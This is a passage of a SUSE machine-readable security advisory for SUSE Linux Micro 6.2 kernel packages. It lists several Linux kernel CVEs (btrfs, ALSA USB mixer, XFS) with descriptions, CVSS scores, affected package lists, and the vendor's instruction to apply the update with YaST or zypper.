"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68778",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68778"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: don\u0027t log conflicting inode if it\u0027s a dir moved in the current transaction\n\nWe can\u0027t log a conflicting inode if it\u0027s a directory and it was moved\nfrom one parent directory to another parent directory in the current\ntransaction, as this can result an attempt to have a directory with\ntwo hard links during log replay, one for the old parent directory and\nanother for the new parent directory.\n\nThe following scenario triggers that issue:\n\n1) We have directories \"dir1\" and \"dir2\" created in a past transaction.\n Directory \"dir1\" has inode A as its parent directory;\n\n2) We move \"dir1\" to some other directory;\n\n3) We create a file with the name \"dir1\" in directory inode A;\n\n4) We fsync the new file. This results in logging the inode of the new file\n and the inode for the directory \"dir1\" that was previously moved in the\n current transaction. So the log tree has the INODE_REF item for the\n new location of \"dir1\";\n\n5) We move the new file to some other directory. This results in updating\n the log tree to included the new INODE_REF for the new location of the\n file and removes the INODE_REF for the old location. This happens\n during the rename when we call btrfs_log_new_name();\n\n6) We fsync the file, and that persists the log tree changes done in the\n previous step (btrfs_log_new_name() only updates the log tree in\n memory);\n\n7) We have a power failure;\n\n8) Next time the fs is mounted, log replay happens and when processing\n the inode for directory \"dir1\" we find a new INODE_REF and add that\n link, but we don\u0027t remove the old link of the inode since we have\n not logged the old parent directory of the directory inode \"dir1\".\n\nAs a result after log replay finishes when we trigger writeback of the\nsubvolume tree\u0027s extent buffers, the tree check will detect that we have\na directory a hard link count of 2 and we get a mount failure.\nThe errors and stack traces reported in dmesg/syslog are like this:\n\n [ 3845.729764] BTRFS info (device dm-0): start tree-log replay\n [ 3845.730304] page: refcount:3 mapcount:0 mapping:000000005c8a3027 index:0x1d00 pfn:0x11510c\n [ 3845.731236] memcg:ffff9264c02f4e00\n [ 3845.731751] aops:btree_aops [btrfs] ino:1\n [ 3845.732300] flags: 0x17fffc00000400a(uptodate|private|writeback|node=0|zone=2|lastcpupid=0x1ffff)\n [ 3845.733346] raw: 017fffc00000400a 0000000000000000 dead000000000122 ffff9264d978aea8\n [ 3845.734265] raw: 0000000000001d00 ffff92650e6d4738 00000003ffffffff ffff9264c02f4e00\n [ 3845.735305] page dumped because: eb page dump\n [ 3845.735981] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=6 ino=257, invalid nlink: has 2 expect no more than 1 for dir\n [ 3845.737786] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14881 owner 5\n [ 3845.737789] BTRFS info (device dm-0): refs 4 lock_owner 0 current 30701\n [ 3845.737792] \titem 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160\n [ 3845.737794] \t\tinode generation 3 transid 9 size 16 nbytes 16384\n [ 3845.737795] \t\tblock group 0 mode 40755 links 1 uid 0 gid 0\n [ 3845.737797] \t\trdev 0 sequence 2 flags 0x0\n [ 3845.737798] \t\tatime 1764259517.0\n [ 3845.737800] \t\tctime 1764259517.572889464\n [ 3845.737801] \t\tmtime 1764259517.572889464\n [ 3845.737802] \t\totime 1764259517.0\n [ 3845.737803] \titem 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12\n [ 3845.737805] \t\tindex 0 name_len 2\n [ 3845.737807] \titem 2 key (256 DIR_ITEM 2363071922) itemoff 16077 itemsize 34\n [ 3845.737808] \t\tlocation key (257 1 0) type 2\n [ 3845.737810] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737811] \titem 3 key (256 DIR_ITEM 2676584006) itemoff 16043 itemsize 34\n [ 3845.737813] \t\tlocation key (258 1 0) type 2\n [ 3845.737814] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737815] \titem 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34\n [ 3845.737816] \t\tlocation key (257 1 0) type 2\n [\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68778",
"url": "https://www.suse.com/security/cve/CVE-2025-68778"
},
{
"category": "external",
"summary": "SUSE Bug 1256683 for CVE-2025-68778",
"url": "https://bugzilla.suse.com/1256683"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68778"
},
{
"cve": "CVE-2025-68783",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68783"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68783",
"url": "https://www.suse.com/security/cve/CVE-2025-68783"
},
{
"category": "external",
"summary": "SUSE Bug 1256650 for CVE-2025-68783",
"url": "https://bugzilla.suse.com/1256650"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68784",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68784"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: fix a UAF problem in xattr repair\n\nThe xchk_setup_xattr_buf function can allocate a new value buffer, which\nmeans that any reference to ab-\u003evalue before the call could become a\ndangling pointer. Fix this by moving an assignment to after the buffer\nsetup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68784",
"url": "https://www.suse.com/security/cve/CVE-2025-68784"
},
{
"category": "external",
"summary": "SUSE Bug 1256793 for CVE-2025-68784",
"url": "https://bugzilla.suse.com/1256793"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
